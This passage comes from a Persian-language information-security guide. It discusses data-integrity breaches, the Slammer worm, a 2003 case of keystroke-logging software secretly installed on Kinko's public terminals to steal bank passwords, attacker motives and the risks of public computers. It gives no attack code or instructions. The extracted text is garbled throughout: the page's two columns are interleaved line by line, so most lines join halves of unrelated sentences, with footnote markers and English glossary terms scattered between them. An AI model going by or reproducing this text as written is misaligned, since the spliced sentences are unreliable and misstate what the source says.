ﻣﻼﺣﻈﻪ ﺍﺳﺖ ﻭ ﺑﺎﺯﻳﺎﺑﻲ ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻧﺎﻣﻤﻜﻦ ﺑﻨﻈﺮ ﻣﻲﺁﻳـﺪ. ﺍﻃﻼﻋﺎﺕ ﻛﻠﻴﺪﻱ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺭﺩ ﻭ ﻫﻤـﻴﻦ ﺍﻣـﺮ
ﺍﮔﺮ ﺷﻤﺎ ﻣﺪﻳﺮ ﻳﻚ ﺭﺳﺎﻧﺔ ﺗﺒﻠﻴﻐﺎﺗﻲ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑـﻪ ﻣﻨـﺎﺑﻊ ﺩﺍﺩﻩﺍﻱ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﺎﻳﺠﻲ ﻧﺎﻣﻌﻠﻮﻡ ﻭ ﺗﺎ ﺍﻧﺪﺍﺯﻩﺍﻱ ﺧﻄﺮﻧـﺎﻙ ﺩﺭ ﭘـﻲ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﻭﺍﺑـﺴﺘﮕﻲ ﺷـﺪﻳﺪ ﺩﺍﺭﺩ ،ﻳـﻚ ﺣﻤﻠـﺔ ﻣﺨـﺮﺏ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﻣﻲ ﺗﻮﺍﻧﺪ ﻣﻮﺟﺐ ﻭﺭﺷﻜﺴﺘﮕﻲ ﻣﺆﺳﺴﻪ ﺷﻤﺎ ﮔﺮﺩﺩ .ﺗﻮﺟﻪ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻴﺪ ﻛﻪ ﻛﺮﻡ Slammerﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺭﺍ ﺁﻟﻮﺩﻩ ﻣﻲﻛـﺮﺩ ﻛـﻪ ﻧﻘﺾ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺍﻃﻼﻋﺎﺕ -ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺭﺍﻳﺎﻧﻪ
ﻭﺻﻠﺔ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺗﻮﺳﻂ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺭﻭﻱ ﺁﻧﻬﺎ ﻧﺼﺐ ﻧﺸﺪﻩ ﺑﻮﺩ. ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺪﻭﻥ ﺍﻃﻼﻉ ﺷﻤﺎ ﺗﻐﻴﻴﺮ ﻛﻨﻨـﺪ ﻭ ﺩﺳـﺘﻜﺎﺭﻱ
ﺷﻮﻧﺪ .ﺑﺮ ﺍﺳﺎﺱ ﻧﻮﻉ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻴـﺪ
ﻳﻜــﻲ ﺍﺯ ﻧﻔﻮﺫﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﻛــﻪ ﺑــﻴﺶ ﺍﺯ ﻳﻜــﺴﺎﻝ ﻓﻌﺎﻟﻴــﺖ ﻧﺘﺎﻳﺞ ﺍﻳﻦ ﺩﺳﺘﻜﺎﺭﻱ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻘﻄﻌﻲ ﻳﺎ ﺩﺭﺍﺯﻣﺪﺕ ﺑﺎﺷـﺪ.
ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺩﺍﺷﺖ ﺭﻭﺷﻬﺎﻱ ﻧﻮﻳﻨﻲ ﺭﺍ ﺑﻪ ﺗﺼﻮﻳﺮ ﻛﺸﻴﺪ ﻛـﻪ ﺑـﺎ ﺍﮔﺮ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺷﺎﻣﻞ ﺳﻮﺍﺑﻖ ﻣﺎﻟﻲ ،ﺍﻃﻼﻋﺎﺕ ﻣـﺸﺘﺮﻳﺎﻥ،
ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﻣﻨﻴﺖ ﺭﺍ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺧﺪﺷﻪﺩﺍﺭ ﻛﺮﺩ: ﻭﺿﻌﻴﺖ ﺳﻔﺎﺭﺷـﺎﺕ ﻳـﺎ ﭘﺮﻭﻧـﺪﻩﻫـﺎﻱ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺑﺎﺷـﻨﺪ،
" ﺁﺳﻮﺷﻴﺘﺪ ﭘـﺮﺱ )ﻧﻴﻮﻳـﻮﺭﻙ( -ﺑـﺮﺍﻱ ﺑـﻴﺶ ﺍﺯ ﻳﻜـﺴﺎﻝ، ﭘﻴﺎﻣﺪﻫﺎﻱ ﻧﻘﺾ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﺁﻧﻬـﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﺴﻴﺎﺭ
٥٦
ﺟﻮﺟﻮ ﺟﻴﺎﻧﮓ ٥٥ﺑﺪﻭﻥ ﺍﻃﻼ ﹺﻉ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺯ ﭘﺎﻳﺎﻧﻪﻫـﺎﻱ ﭘﺮﻫﺰﻳﻨﻪ ﻭ ﺯﻳﺎﻧﺒﺎﺭ ﺑﺎﺷﺪ.
ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ ﻓﺮﻭﺷﮕﺎﻫﻬﺎﻱ ﻛﻴﻨﻜﻮ ٥٧ﺩﺭ ﻧﻴﻮﻳﻮﺭﻙ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻘﺾ ﺍﻧﺴﺠﺎﻡ ﺷﺒﻜﻪ ﺍﺯ ﻃﺮﻳﻖ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺷﺒﻜﻪﻫﺎ
ﻣﻲﻛﺮﺩﻧﺪ ،ﺁﻧﭽﻪ ﻛﻪ ﺁﻧﻬﺎ ﺗﺎﻳﭗ ﻣﻲﻛﺮﺩﻧﺪ ﺭﺍ ﺛﺒﺖ ﻣﻲﻛﺮﺩ. -ﻫﺮﭼﻨﺪ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﺑﻪ ﻃﻮﺭ ﻣﺴﺘﻘﻴﻢ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗـﺮﺍﺭ
ﺟﻴﺎﻧﮓ ﺑﺼﻮﺭﺕ ﻣﺨﻔﻴﺎﻧﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍ ﺩﺭ ﺣﺪﺍﻗﻞ ﭼﻬﺎﺭﺩﻩ ﻧﮕﺮﻓﺘﻪﺍﻳﺪ ،ﻭﻟﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﺍﻳﺎﻧﻪ ﻫﺎﻱ ﺩﻳﮕﺮﻱ ﻛـﻪ ﺑـﻪ
ﻓﺮﻭﺷﮕﺎﻩ ﻛﻴﻨﻜﻮ ﻧﺼﺐ ﻛﺮﺩﻩ ﺑﻮﺩ ﻛﻪ ﻣﻲ ﺗﻮﺍﻧﺴﺖ ﻓﺸﺮﺩﻥ ﺁﻧﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪﺍﻳﺪ ﻣﻮﺭﺩ ﺣﻤﻠـﻪ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ ﻭ ﺍﻳـﻦ
ﻣﺴﺌﻠﻪ ﺭﻭﻱ ﺷﻤﺎ ﻧﻴﺰ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺑﺎﺷـﺪ .ﺩﺭ ﺍﻳﻨـﺼﻮﺭﺕ ﺍﮔـﺮ
52 Web Server ﻼ ﻳﻚ ﻣﺆﺳـﺴﺔ ﻣـﺎﻟﻲ ﻭ ﺍﻋﺘﺒـﺎﺭﻱ ﺑﺎﺷـﻴﺪ ﺣـﻴﻦ ﺩﻭﺭﺓ ﻣﺜ ﹰ
53 Authentication Tokens ﺑﺎﺯﻳﺎﺑﻲ ﺍﻃﻼﻋﺎﺕ ﻗﺎﺩﺭ ﺑﻪ ﺗﻜﻤﻴﻞ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻣﺎﻟﻲ ﺧـﻮﺩ
54 Denial of Access
55 Juju Jiang ﻧﺨﻮﺍﻫﻴﺪ ﺑﻮﺩ.
56 Terminals
57 Kinko's Stores
٣٩ ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﺩﻭﺭ ﺳﺎﺧﺘﻦ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ﻣﻨﺎﺑﻊ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻛﻠﻴﺪﻫﺎﻱ ﺍﻓﺮﺍﺩ ﺭﺍ ﺛﺒﺖ ﻧﻤﺎﻳﺪ .ﺍﻳـﻦ ﻧـﺮﻡ ﺍﻓـﺰﺍﺭ ﺩﺭ ﻃـﻮﻝ
ﺟﺪﻳﺪ ﻧﻴﺴﺖ ،ﺑﻠﻜﻪ ﻗﺪﺭﺕ ﺑﺨـﺸﻴﺪﻥ ﺑـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ﺑـﺮﺍﻱ ﻟـﺬﺕ ﻓﻌﺎﻟﻴﺖ ﻳﻜﺴﺎﻟﺔ ﺧﻮﺩ ﺑﻴﺶ ﺍﺯ ۴۵۰ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ
ﺑﺨﺶ ﺍﻭﻝ
ﺑﺮﺩﻥ ﺍﺯ ﺍﻳﻦ ﺩﻧﻴﺎﻱ ﻧﻮﻳﻦ ﺑﻪ ﺭﻭﺷﻲ ﺍﻳﻤﻦ ﻭ ﻣﻄﻤـﺌﻦ ﺍﺳـﺖ .ﺩﺭ ﻋﺒــﻮﺭ ﺛﺒــﺖ ﻛــﺮﺩﻩ ﻭ ﺍﺯ ﺁﻧﻬــﺎ ﺑــﺮﺍﻱ ﺩﺳﺘﺮﺳــﻲ ﻭ ﺣﺘــﻲ
ﻳﻚ ﻛﻼﻡ ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻫﺪﻑ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺗﻮﺳـﻌﺔ ﺑﺎﺯﻛﺮﺩﻥ ﺣﺴﺎﺑﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺑﺮﺧﻂ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﻮﺩ.
ﺩﺭﻙ ﻭﺍﻗﻊﮔﺮﺍﻳﺎﻧﻪ ﻭ ﻋﻤﻴﻖ ﺍﺯ ﻣﺎﻫﻴﺖ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻣﻮﺟـﻮﺩ ﺍﻳﻦ ﭘﺮﻭﻧﺪﻩ ﻛﻪ ﺩﺭ ﺍﻭﺍﻳـﻞ ﺍﻳـﻦ ﻣـﺎﻩ ﭘـﺲ ﺍﺯ ﺩﺳـﺘﮕﻴﺮﻱ
ﺑﻪ ﻣﻨﻈﻮﺭ ﻛﺎﻫﺶ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺍﻓﺰﺍﻳﺶ ﻧﻘﺎﻁ ﻗـﻮﺕ ﻓﻨـﺎﻭﺭﻱ ﺟﻴﺎﻧﮓ ﻣﻨﺠﺮ ﺑﻪ ﺗﻌﻴﻴﻦ ﻣﺠﺎﺯﺍﺕ ﺑﺮﺍﻱ ﻭﻱ ﺷﺪ ﺧﻄﺮﻫﺎﻱ
ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻲﺑﺎﺷﺪ.
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﻳﺎﻧﻪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﻛـﺎﻓﻲﻧـﺖﻫـﺎ،
ﻛﺘﺎﺑﺨﺎﻧﻪ ﻫـﺎ ،ﻓﺮﻭﺩﮔﺎﻫﻬـﺎ ﻭ ﺩﻳﮕـﺮ ﻣﺆﺳـﺴﺎﺕ ﺭﺍ ﺁﺷـﻜﺎﺭ
ﺍﻧﮕﻴﺰﺓ ﺧﺮﺍﺑﻜﺎﺭﺍﻥ ﺍﻣﻨﻴﺘﻲ ﭼﻴﺴﺖ؟
ﻣﻲﺳـﺎﺯﺩ .ﻧﻴـﻞ ﻣﻬﺘـﺎ ٥٨ﻣﻬﻨـﺪﺱ ﭘـﮋﻭﻫﺶ ﺩﺭ ﻣﺆﺳـﺴﺔ
ﺩﺭ ﺯﻧﺪﮔﻲ ﻭﺍﻗﻌﻲ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺗﺨﻠﻔﺎﺕ ﺟﻨﺎﻳﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﻤﻦ ﺍﻳﻨﺘﺮﻧﺘﻲ ٥٩ﻫﺸﺪﺍﺭ ﻣﻲﺩﻫﺪ ﻛﻪ "ﻫﻨﮕـﺎﻡ
ﻋﻠﻴﻪ ﻳﻚ ﺷﺨﺺ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻳﻜﻲ ﺍﺯ ﺩﻻﻳﻞ ﻋﻤـﺪﻩ، ﺶ ﻋﺮﻓـﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﺮ ﻳﻚ ﺍﺯ ﭘﺎﻳﺎﻧﻪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺍﺯ ﺩﺍﻧ ﹺ
ﺍﻧﺘﻘﺎﻣﮕﻴﺮﻱ ﻓﺮﺩ ﺧﺮﺍﺑﻜﺎﺭ ﺍﺯ ﺷﺨﺼﻲ ﻛـﻪ ﻓﻜـﺮ ﻣـﻲﻛﻨـﺪ ﺑـﻪ ﺍﻭ ﺧﻮﺩ ﺑﻬﺮﻩ ﺑﮕﻴﺮﻳﺪ .ﺑـﺮﺍﻱ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺭﻭﺯﻣـﺮﻩ
ﺁﺳﻴﺒﻲ ﺭﺳﺎﻧﺪﻩ ،ﻭ ﻳﺎ ﺑﺪﺳﺖﺁﻭﺭﺩﻥ ﭘﻮﻝ ﺍﺳﺖ. ﻧﻈﻴﺮ ﺍﺗﺼﺎﻝ ﺑـﻪ ﻭﺏ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﺎ ﻣـﺸﻜﻠﻲ ﻣﻮﺍﺟـﻪ
ﻧﻈﻴﺮ ﻫﻤﻴﻦ ﺗﺨﻠﻔﺎﺕ ﻧﻴﺰ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﺍﻣﺎ ﺗﺨﻠﻒ ﻧﺸﻮﻳﺪ ﺍﻣﺎ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﻫـﺮ ﻛـﺎﺭﻱ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﺩﺭ ﺍﻳﻦ ﻓﻀﺎ ﺍﺯ ﺟﻨﺲ ﺩﻳﮕﺮﻱ ﺍﺳﺖ .ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﺮﺍﻱ ﮔﺮﻭﻫﻲ ﺣﺴﺎﺳﻴﺖ ﺍﻳﺠﺎﺩ ﻛﻨﺪ ﺍﺑﺘـﺪﺍ ﻛﻤـﻲ ﻓﻜـﺮ ﻛﻨﻴـﺪ" .ﺟﻴﺎﻧـﮓ
ﺍﺯ ﺍﻓﺮﺍﺩ -ﻛﻪ ﻋﻤﻮﻣﹰﺎ "ﺧﺮﺍﺑﻜﺎﺭ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﻧﺪ ﻭ ﻗﺎﺩﺭﻧـﺪ ﻭﺍﺭﺩ ﺯﻣﺎﻧﻲ ﺩﺳﺘﮕﻴﺮ ﺷﺪ ﻛﻪ ﻣﻄﺎﺑﻖ ﺳﻮﺍﺑﻖ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺩﺍﺩﮔـﺎﻩ
ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺍﻓﺮﺍﺩ ﺷﻮﻧﺪ ﻭ ﻳﺎ ﺑﻌﻨﻮﺍﻥ ﺗﻔﺮﻳﺢ ﻭ ﺳﺮﮔﺮﻣﻲ ﺑﻪ ﺍﺯ ﻳﻜﻲ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣـﺴﺮﻭﻗﻪ ﺑـﺮﺍﻱ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ
ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺁﺳﻴﺐ ﺑﺮﺳﺎﻧﻨﺪ -ﻳﻚ ﻣﺤﻴﻂ ﭼﺎﻟﺶ ﺑﺮﺍﻧﮕﻴﺰ ﺍﺳـﺖ. ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺠﻬﺰ ﺑﻪ ﻧـﺮﻡ ﺍﻓـﺰﺍﺭ GoToMyPCﺍﺳـﺘﻔﺎﺩﻩ
ﺑﻌﺒــﺎﺭﺕ ﺩﻳﮕــﺮ ،ﺁﻧﻬــﺎ ﻗــﺪﺭﺕ ﻧﻔــﻮﺫ ﺑــﻪ ﺣــﺴﺎﺑﻬﺎﻱ ﻛــﺎﺭﺑﺮﻱ، ﻛﺮﺩﻩ ﺑﻮﺩ .ﺍﻳﻦ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺑﻪ ﺍﻓﺮﺍﺩ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﺯ ﺭﺍﻩ
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﺷﺒﻜﻪﺍﻱ ﺭﺍ ﻳﻚ ﺍﻓﺘﺨﺎﺭ ﺑﺮﺍﻱ ﺧﻮﺩ ﺩﻭﺭ ﻭ ﺍﺯ ﻫﺮ ﻣﻜﺎﻧﻲ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ ﻛﻨﻨـﺪ.
ﻣﻲﺩﺍﻧﻨﺪ .ﻣﺸﺎﺑﻪ ﺍﻳﻦ ﺭﻓﺘﺎﺭ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺑﺴﻴﺎﺭ ﻧﺎﺩﺭ ﺍﺳﺖ. ﺷﺨــﺼﻲ ﻛــﻪ ﺑﺮﻧﺎﻣــﺔ GoToMyPCﺭﻭﻱ ﺭﺍﻳﺎﻧــﺔ ﻭﻱ
ﻧﺼﺐ ﺷﺪﻩ ﺑـﻮﺩ ﺩﺭ ﺯﻣـﺎﻥ ﻭﻗـﻮﻉ ﺟـﺮﻡ ﺩﺭ ﺧﺎﻧـﻪ ﺑـﻮﺩ ﻭ
ﻻ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺧﻮﺩ ﺭﺍ "ﺟﻨﺎﻳﺎﺕ ﺑﺪﻭﻥ ﻗﺮﺑﺎﻧﻲ" ﺑـﻪ ﺧﺮﺍﺑﻜﺎﺭﻫﺎ ﻣﻌﻤﻮ ﹰ ﻧﺎﮔﻬﺎﻥ ﻣﺘﻮﺟﻪ ﺷﺪ ﻣﻜـﺎﻥﻧﻤـﺎﻱ ﺭﺍﻳﺎﻧـﺔ ﺍﻭ ﺭﻭﻱ ﺻـﻔﺤﻪ
ﺣﺴﺎﺏ ﻣﻲﺁﻭﺭﻧﺪ .ﺍﺳﺘﺪﻻﻝ ﺁﻧﻬﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻭﻗﺘﻲ ﻳﻚ ﺣﺴﺎﺏ ﺷﺮﻭﻉ ﺑﻪ ﺣﺮﻛﺖ ﻛﺮﺩ ﻭ ﻓﺎﻳﻠﻬﺎ ﺧﻮﺩ ﺑﻪ ﺧـﻮﺩ ﺑـﺎﺯ ﺷـﺪﻧﺪ.
ﻛﺎﺭﺑﺮﻱ ﻳﺎ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ ﻭﻟـﻲ ﭼﻴـﺰﻱ ﺳﭙﺲ ﺩﻳﺪ ﻛﻪ ﻳﻚ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﺑـﺎﺯ ﻭ ﻧـﺎﻡ ﺍﻭ ﺩﺭ ﻳـﻚ
ﺗﻐﻴﻴﺮ ﻧﻤﻲﻳﺎﺑﺪ ﻭ ﺩﺯﺩﻳﺪﻩ ﻧﻤﻲﺷﻮﺩ ﭼـﻪ ﺁﺳـﻴﺒﻲ ﺑـﻪ ﻛـﺴﻲ ﻭﺍﺭﺩ ﺳﺮﻭﻳﺲ ﺧﺮﻳﺪ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭﺝ ﺷـﺪ .ﺟﻴﺎﻧـﮓ ﻛـﻪ ﻣﻨﺘﻈـﺮ
ﺷﺪﻩ ﺍﺳﺖ؟ ﺩﺭ ﻭﺍﻗﻊ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺑﻪ ﺗﺄﺛﻴﺮﺍﺕ ﺣﻘﻮﻗﻲ ﻭ ﭘﻴﺎﻣـﺪﻫﺎﻱ ﺻﺪﻭﺭ ﺣﻜﻢ ﺩﺍﺩﮔـﺎﻩ ﺍﺳـﺖ ،ﻧﻬﺎﻳﺘـﹰﺎ ﺩﺭ ﭼﻬـﺎﺭﺩﻫﻢ ﻓﻮﺭﻳـﻪ
ﺍﻳﻨﻜﺎﺭ ﺗﻮﺟﻪ ﻧﻤﻲﻛﻨﻨﺪ ﻭ ﺑﻪ ﺍﺣـﺴﺎﺱ ﻧـﺎﺍﻣﻨﻲ ﻗﺮﺑﺎﻧﻴﺎﻧـﺸﺎﻥ ﻛـﻪ ۲۰۰۱ﺑﻪ ﻧﺼﺐ ﻛﺮﺩﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﻔﻲ ﺛﺒﺖﻛﻨﻨـﺪﺓ ﻛﻠﻴـﺪ
ﻧﺎﺷﻲ ﺍﺯ ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻣﻲﺷﻮﺩ ﻧﻴـﺰ ﺍﻫﻤﻴﺘـﻲ ﻧﻤـﻲ ﺩﻫﻨـﺪ. ٦٠
ﺩﺭ ﻓﺮﻭﺷﮕﺎﻫﻬﺎﻱ ﻛﻴﻨﻜﻮ ﺍﻋﺘﺮﺍﻑ ﻛﺮﺩ.
ﻣﺸﺎﺑﻪ ﺍﻳﻦ ﺭﻓﺘﺎﺭ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﺜﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻓﺮﺩﻱ ﻭﺍﺭﺩ
ﺧﺎﻧﺔ ﺷﻤﺎ ﺷﻮﺩ ﻭ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﻧﻴﺰ ﺑﺘﻮﺍﻧﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺗﻜﺮﺍﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺭﺍﻫﻨﻤﺎﻳﻲ ﺩﺭﺑﺎﺭﺓ ﺍﻣﻨﻴﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻫﻢ ﺩﺭ ﻣﺤﻴﻂ ﺧﺎﻧـﻪ
ﻛﻨﺪ .ﻣﺴﻠﻤﹰﺎ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻏﻴﺮﻗﺎﺑﻞ ﺗﺤﻤﻞ ﺧﻮﺍﻫﺪ ﺑﻮﺩ. ﻭ ﻫﻢ ﺩﺭ ﻣﺤﻴﻂ ﺗﺠﺎﺭﻱ ﻣﻲﺑﺎﺷﺪ ﻭ ﻟﺬﺍ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﻭﺳﻴﻌﻲ
ﺩﺭﺑﺎﺭﺓ ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﻣﺎﻧﻨـﺪ ﻣﺨـﺎﻃﺮﺍﺕ ،ﻧﺘـﺎﻳﺞ ﺣﻤـﻼﺕ،
ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﻧﺎﻗﻀﺎﻥ ﺍﻣﻨﻴﺖ ﻛﻤـﻚ ﺯﻳـﺎﺩﻱ ﻣـﻲ ﻛﻨـﺪ. ﺭﻭﺷــﻬﺎﻱ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺭﺍﻳﺎﻧــﻪﻫــﺎ ،ﺷــﺒﻜﻪﻫــﺎ ﻭ ﺩﺍﺩﻩﻫــﺎ ،ﻭ ﻧﻴــﺰ
ﺑﺮﺧــﻲ ﺍﺯ ﺧﺮﺍﺑﻜﺎﺭﻫــﺎ ﺩﺍﺭﺍﻱ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﻧﻔــﻮﺫ ﻫــﺴﺘﻨﺪ ﻛــﻪ ﺑــﻪ ﻲ
ﻱ ﺍﻣﻨﻴﺘـ ﹺ ﻱ ﺍﺳﺘﺮﺍﺗﮋ ﹺ
ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﻗﺒﻞ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯ ﹺ
ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﺎﺯﻩﻛﺎﺭ ﻫﻢ ﺍﻣﻜﺎﻥ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﺯ ﺑﺮﺧﻲ ﻣﺆﺛﺮ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ .ﻫـﺪﻑ ﻧﻬـﺎﻳﻲ ﺍﻳـﻦ ﻛﺘـﺎﺏ
ﻻ ﺑﻪ ﮔﺮﻭﻫﻬﺎﻱ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺭﺍ ﻣﻲﺩﻫﺪ .ﭼﻨﻴﻦ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻣﻌﻤﻮ ﹰ
ﺧﺒﺮﻱ Usenetﻛﻪ ﺑﺴﻴﺎﺭ ﻣﺸﻬﻮﺭ ﻫﺴﺘﻨﺪ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻭ 58 Neel Mehta
ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺑـﺰﺍﺭ ﺭﺍ ﺍﺯ ﺁﻧﺠـﺎ ﭘﻴـﺪﺍ ﻛـﺮﺩﻩ ﻭ ﻣـﻮﺭﺩ 59 Internet Security Systems
60 Associated Press Bulletin, July 23, 2003
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٠
ﻫﻨﮕﺎﻣﻴﻜﻪ ﻣﺮﺩﻡ ﺑﺮﺍﻱ ﮔـﺮﻓﺘﻦ ﭘـﻮﻝ ﺍﺯ ﺍﻳـﻦ ﻣﺎﺷـﻴﻦ ﻛـﺎﺭﺕ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ ﺍﺑﺰﺍﺭﻫـﺎ ﻣﻤﻜـﻦ
